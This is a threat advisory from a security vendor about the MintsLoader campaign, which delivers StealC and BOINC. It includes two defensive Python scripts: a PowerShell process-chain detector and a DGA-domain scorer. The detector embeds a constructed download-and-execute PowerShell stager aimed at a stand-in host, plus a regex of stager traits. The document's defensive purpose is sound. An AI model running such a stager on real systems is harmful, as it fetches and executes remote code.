
Cybersecurity Threat Advisory

A cyber campaign has been identified using the MintsLoader malware loader to deliver secondary payloads, such as the StealC information stealer and the legitimate open-source network computing platform, BOINC. This campaign has primarily targeted sectors such as electricity, oil and gas, and legal services across the United States and Europe. Continue to review this Cybersecurity Threat Advisory in order to stay protected from this threat.

What is the threat?

MintsLoader is a PowerShell-based malware loader designed to deliver various secondary payloads to compromised systems. The infection typically begins when a user clicks on a malicious link in a phishing email or falls for a fake browser update notification. These links may lead to a compromised website or a direct download of an obfuscated JavaScript file. Upon execution, the JavaScript script triggers a PowerShell command that downloads and executes MintsLoader.
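The chain above (JavaScript file, then a PowerShell command that downloads and executes the loader) leaves a recognisable trace in Windows process-creation telemetry: a script host such as wscript.exe or cscript.exe spawning powershell.exe. The following detector is an added example written for this advisory; it is not Barracuda's code and not taken from any MintsLoader analysis. The Sysmon-style field names, the sample events, the stager text and the example.invalid URL are all constructed, and the indicator list and the two-indicator threshold are assumptions to be tuned against your own baseline.

```python
"""Flag script-host -> PowerShell process chains in process-creation telemetry.

Added example, not code from the advisory or from Barracuda. In Windows
process-creation logs the chain "JavaScript file -> PowerShell download and
execute" appears as wscript.exe or cscript.exe spawning powershell.exe,
usually with a one-line stager. This checks that lineage plus a few
command-line traits, decoding -EncodedCommand (base64 of UTF-16LE) so the
real command is scanned too. Field names follow Sysmon event 1; every
event in SAMPLE_EVENTS, the stager text and the URL are constructed.
"""
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\b"        # encoded payload
    r"|-w(?:indowstyle)?\s+hidden"           # hidden console window
    r"|-nop\b|-noprofile\b"                  # skip profile (stagers, but also admin scripts)
    r"|bypass"                               # -ExecutionPolicy Bypass
    r"|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|\biex\b|invoke-expression",
    re.I,
)
MIN_INDICATORS = 2  # assumption: a single flag such as -NoProfile alone is too noisy

# Constructed stager text; its base64 form is built here rather than hand-typed.
STAGER_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
ENCODED = base64.b64encode(STAGER_TEXT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # routine admin job: PowerShell started by a service host, file-based script
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    },
    {   # the chain the advisory describes: script host -> hidden, encoded PowerShell
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell.exe -w hidden -nop -ExecutionPolicy Bypass -enc {ENCODED}",
    },
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Classify one process-creation event.

    Suspicious when a script host spawned PowerShell, or when the command
    line (including the decoded payload) carries MIN_INDICATORS or more
    stager traits. The reasons are returned so an analyst can see why it fired.
    """
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmdline = event["CommandLine"]
    reasons = []
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        reasons.append(f"{parent} spawned {image}")
    decoded = decode_encoded_command(cmdline) if image in POWERSHELL else None
    scan_text = cmdline if decoded is None else f"{cmdline} {decoded}"
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(scan_text)})
    if len(hits) >= MIN_INDICATORS:
        reasons.append("command-line indicators: " + ", ".join(hits))
    return {"suspicious": bool(reasons), "reasons": reasons, "hits": hits, "decoded": decoded}


def scan(events):
    """Return the analyze() results for every suspicious event."""
    return [r for r in (analyze(e) for e in events) if r["suspicious"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print("; ".join(r["reasons"]))
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

The lineage check fires on its own because a script host launching PowerShell is rare in ordinary use, while command-line traits are only counted in combination: -NoProfile appears in plenty of legitimate scheduled jobs, so the first sample event stays quiet. Decoding the -EncodedCommand payload before matching matters because the download-and-execute text is otherwise invisible to a plain string match on the command line.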

MintsLoader operates with a sophisticated command-and-control (C2) mechanism, using a Domain Generation Algorithm (DGA) to determine its C2 domain dynamically. This feature enables it to evade detection by traditional security tools that rely on static domain blocking. Once it establishes communication with the C2 server, MintsLoader retrieves additional payloads and executes them on the infected system.
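Because a DGA defeats static domain blocklists, the practical counter is to look at the names themselves and at query behaviour: algorithmically generated labels tend to have high character entropy, few vowels and long consonant runs, and an infected host typically queries many candidates in a burst until one resolves. The script below is an added example for this advisory, not Barracuda's code and not a model of MintsLoader's actual generation scheme, which the advisory does not describe. The log format, every sample line, the feature thresholds and the flagging cut-off are constructed assumptions.

```python
"""Heuristic triage of DNS query logs for DGA-like domain names.

Added example, not code from the advisory, Barracuda, or any MintsLoader
analysis; the advisory does not publish the loader's generation scheme, so
this scores generic traits that algorithmically generated labels tend to
share rather than any specific DGA. The "key=value" resolver log format,
every line in SAMPLE_DNS_LOG and the thresholds are constructed.
"""
import math
import re
from collections import Counter, defaultdict

VOWELS = set("aeiou")
CONSONANT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxyz]{5,}")
QUERY_FIELD = re.compile(r"client=(\S+)\s+query=(\S+)")
FLAG_THRESHOLD = 2.5  # assumed cut-off; tune against your own baseline traffic

# Constructed log lines; the last two clients' names are made up to look generated.
SAMPLE_DNS_LOG = """\
2025-01-15T10:22:01Z client=10.0.0.5 query=www.microsoft.com type=A
2025-01-15T10:22:03Z client=10.0.0.5 query=cdn.updateservice.net type=A
2025-01-15T10:22:09Z client=10.0.0.7 query=xk7qvtrzp3wm.com type=A
2025-01-15T10:22:09Z client=10.0.0.7 query=hfjkwqrtzbnm.net type=A
2025-01-15T10:22:10Z client=10.0.0.9 query=a1b2c3.example.com type=A
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registrable_label(domain: str) -> str:
    """Label directly left of the TLD ('example' for 'www.example.com').

    Assumes a single-label TLD; multi-part public suffixes such as co.uk
    would need a public-suffix list, which this example deliberately omits.
    """
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(domain: str) -> float:
    """Score one domain; higher means more DGA-like. Features are additive."""
    label = registrable_label(domain)
    score = 0.0
    if shannon_entropy(label) > 3.5:          # many distinct characters
        score += 1.0
    vowel_ratio = sum(ch in VOWELS for ch in label) / max(len(label), 1)
    if vowel_ratio < 0.2:                     # pronounceable words contain vowels
        score += 1.0
    if CONSONANT_RUN.search(label):           # five or more consonants in a row
        score += 1.0
    if re.search(r"\d", label) and re.search(r"[a-z]", label):
        score += 0.5                          # letters and digits mixed
    if len(label) >= 12:
        score += 0.5
    return score


def triage(log_text: str, threshold: float = FLAG_THRESHOLD):
    """Return (flagged, per_client): flagged is [(client, domain, score), ...].

    The per-client count is the useful signal: a DGA-driven host queries
    many candidate domains in a short burst until one resolves, so several
    hits from one client outweigh a single odd-looking name.
    """
    flagged = []
    per_client = defaultdict(int)
    for line in log_text.splitlines():
        m = QUERY_FIELD.search(line)
        if not m:
            continue
        client, domain = m.group(1), m.group(2)
        score = dga_score(domain)
        if score >= threshold:
            flagged.append((client, domain, score))
            per_client[client] += 1
    return flagged, dict(per_client)


if __name__ == "__main__":
    hits, counts = triage(SAMPLE_DNS_LOG)
    for client, domain, score in hits:
        print(f"{client} -> {domain} (score {score})")
    print("flagged lookups per client:", counts)
```

Run on the constructed log, only the two made-up names from 10.0.0.7 cross the threshold, and that host shows two hits in the same second, which is the burst pattern worth escalating. The legitimate names score low even when long (updateservice) or when a subdomain looks random (a1b2c3.example.com), because only the registrable label is scored. Heuristics like these produce false positives on CDN and tracking hostnames, so treat the score as a triage aid feeding a per-host threshold, not a block rule.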

One of MintsLoader’s primary payloads is StealC, an information-stealing malware designed to extract sensitive user data, including credentials, cookies, autofill information, and cryptocurrency wallet details, from various applications and web browsers. The attacker transmits the stolen information to their C2 server for further exploitation or sale on dark web marketplaces.

Additionally, MintsLoader has been observed deploying BOINC, an open-source software platform initially designed for distributed computing projects. While BOINC is not malicious, attackers leverage it to use the compromised device’s processing power surreptitiously. This could facilitate unauthorized cryptocurrency mining operations or be used as part of a larger botnet to conduct distributed denial-of-service (DDoS) attacks. By exploiting BOINC, attackers can abuse system resources without raising immediate suspicion, as the software may appear legitimate to system administrators.

Why is it noteworthy?

This campaign is significant due to its combination of sophisticated malware delivery techniques and the exploitation of legitimate software. The use of MintsLoader’s DGA for C2 communication makes it challenging for security solutions to detect and block malicious domains. Furthermore, the deployment of StealC poses a substantial risk to sensitive information, while the misuse of BOINC could lead to unauthorized utilization of system resources. The targeting of critical infrastructure sectors amplifies the potential impact, underscoring the importance of heightened vigilance and robust security measures.

What is the exposure or risk?

Organizations affected by this threat may experience significant data breaches, including the loss of confidential information and intellectual property. The unauthorized use of system resources through the deployment of BOINC could result in degraded system performance, increased operational costs, and potential involvement in illicit activities without the organization’s knowledge. Moreover, the compromise of systems within critical infrastructure sectors could have far-reaching consequences, potentially disrupting essential services and undermining public trust.

What are the recommendations?

Barracuda strongly recommends that organizations take these additional steps to defend against this threat:

  • Conduct regular training sessions to educate employees about the dangers of phishing emails and the importance of not interacting with suspicious links or attachments.
  • Deploy advanced email filtering solutions, such as Barracuda Email Protection, to detect and block malicious emails before they reach end-users.
  • Use reputable endpoint protection platforms capable of detecting and preventing the execution of malicious scripts and payloads.
  • Keep systems and software up-to-date with the latest security patches to reduce vulnerabilities that malware could exploit.
  • Restrict the execution of unauthorized applications and scripts through application whitelisting policies.

References

For more in-depth information about the threat, please visit the following links:

If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.



Posted by Vincent Yu

Vincent is a Cybersecurity Analyst at Barracuda. He's a security expert, working on our Blue Team within our Security Operations Center. Vincent supports our XDR service delivery and is highly skilled at analyzing security events to detect cyber threats, helping keep our partners and their customers protected.
